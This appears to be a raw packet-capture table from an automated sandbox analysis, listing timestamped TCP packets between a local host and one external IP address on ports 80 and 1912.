                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.678761959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.688085079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.688138962 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.688250065 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.688544035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.688602924 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.688668013 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.689287901 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.689340115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.689389944 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.690097094 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.690207958 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.691481113 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.691764116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.691775084 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.691837072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.691864967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.691929102 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.692543983 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.692682028 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.692734003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.693370104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.693514109 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.693568945 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.694226027 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.694334984 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.694386005 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.695205927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.695219994 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.695282936 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.695851088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.695960999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.696010113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.696672916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.743321896 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.820283890 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.820322990 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.820333958 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.820378065 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.820379019 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.820390940 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.820403099 CET191249710185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.820421934 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.820446968 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.835443974 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.835485935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.835561991 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.835617065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.835793018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.835841894 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.836487055 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.836546898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.836599112 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.837248087 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.837368965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.837415934 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.838233948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.838284969 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.838332891 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.839082003 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.839174032 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.839232922 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.840090990 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.840164900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.840218067 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.840655088 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.840733051 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.840780973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.841507912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.841680050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.841736078 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.842417002 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.842535973 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.842587948 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.843149900 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.843179941 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.843230009 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.843959093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.844068050 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.844119072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.844779968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.844871998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.844926119 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.845762968 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.845817089 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.845870018 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.846434116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.846555948 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.846606016 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.847294092 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.847628117 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.847697020 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.848109961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.848231077 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.848280907 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.849088907 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.849195957 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.849248886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.849917889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.849961996 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.850013971 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.850630045 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.850712061 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.850764990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.851458073 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.851568937 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.851624966 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.852304935 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.852385998 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.852442026 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.853173018 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.853247881 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.853303909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.853972912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.854063034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.854110003 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.854949951 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.854995966 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.855045080 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.855628967 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.855707884 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.855751038 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.856475115 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.856551886 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.856596947 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.857372999 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.857444048 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.857494116 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.858108997 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.858225107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.858273983 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.859006882 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.859158039 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.859204054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.859891891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.860071898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.860117912 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.860620022 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.860734940 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.860801935 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.861491919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.861567020 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.861613035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.862296104 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.862382889 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.862431049 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.863138914 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.863244057 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.863289118 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.863955975 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.864053965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.864105940 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.864845991 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.864888906 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.864933014 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.865653992 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.865741014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.865786076 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.866663933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.866803885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.866852045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.867322922 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.867389917 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.867436886 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.868158102 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.868269920 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.868334055 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.868977070 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.869076014 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.869116068 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.869823933 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.869904041 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.869940996 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.870624065 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.880528927 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.880556107 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.880584002 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.880812883 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.880852938 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.880904913 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.881715059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.881740093 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.881758928 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.882503033 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.882555962 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.883833885 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.883892059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.883948088 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.884038925 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.884080887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.884114981 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.884939909 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.885045052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.885090113 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.885752916 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.885854959 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.885900021 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.886583090 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.886666059 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.886709929 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.887469053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.887564898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.887612104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.888572931 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.888825893 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.888874054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.889630079 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.930828094 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:46.965924025 CET497101912192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.028013945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.028058052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.028199911 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.028302908 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.028538942 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.028686047 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.029303074 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.029402971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.029442072 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.030107021 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.030205965 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.030246973 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.031069040 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.031254053 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.031311035 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.031963110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.032099009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.032135963 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.032969952 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.033046961 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.033085108 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.033679008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.033737898 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.033776045 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.034426928 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.034526110 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.034564972 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.035109043 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.035262108 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.035298109 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.036031008 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.036124945 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.036165953 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.036883116 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.037000895 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.037046909 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.037538052 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.037570000 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.037610054 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.038465977 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.038630009 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.038697004 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.039136887 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.039211035 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.039252043 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.039952993 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.040076971 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.040117025 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.041477919 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.041606903 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.041651011 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.041755915 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.041857004 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.041894913 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.042440891 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.042573929 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.042618990 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.043263912 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.043380976 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.043440104 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.044106960 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.044199944 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.044240952 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.044934034 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.045068979 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.045118093 CET4970980192.168.2.8185.81.68.147
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.045768023 CET8049709185.81.68.147192.168.2.8
                                                                                                                                                                                                                      Dec 15, 2024 09:15:47.045881987 CET8049709185.81.68.147192.168.2.8
